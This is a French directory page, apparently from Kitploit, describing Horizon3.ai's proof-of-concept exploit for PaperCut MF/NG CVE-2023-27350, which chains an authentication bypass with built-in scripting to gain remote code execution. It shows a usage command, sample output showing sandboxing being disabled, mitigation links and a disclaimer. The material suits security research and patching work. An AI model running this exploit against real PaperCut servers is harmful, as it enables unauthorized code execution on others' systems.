Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/horizon3ai/cve-2023-27350
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

Exploit de preuve de concept pour PaperCut CVE-2023-27350, enchaînant un contournement d'authentification avec l'abus de scripts intégrés pour obtenir une exécution de code à distance sur des instances MF/NG vulnérables.

Voir le dépôt
55242il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-27350

POC pour CVE-2023-27350 affectant PaperCut MF/NG

Analyse technique

Une analyse technique de la cause racine de la vulnérabilité, des indicateurs de compromission et de l'exposition sur Internet est disponible sur notre blog : https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

Résumé

Ce POC utilise une vulnérabilité de contournement d'authentification combinée à l'abus de fonctionnalités de script intégrées pour exécuter du code.

Utilisation

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Mesures d'atténuation

Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans l'avis de sécurité PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Suivez l'équipe d'attaque Horizon3.ai sur Twitter pour les dernières recherches en sécurité :

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les responsables du projet ne sont pas responsables en cas d'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil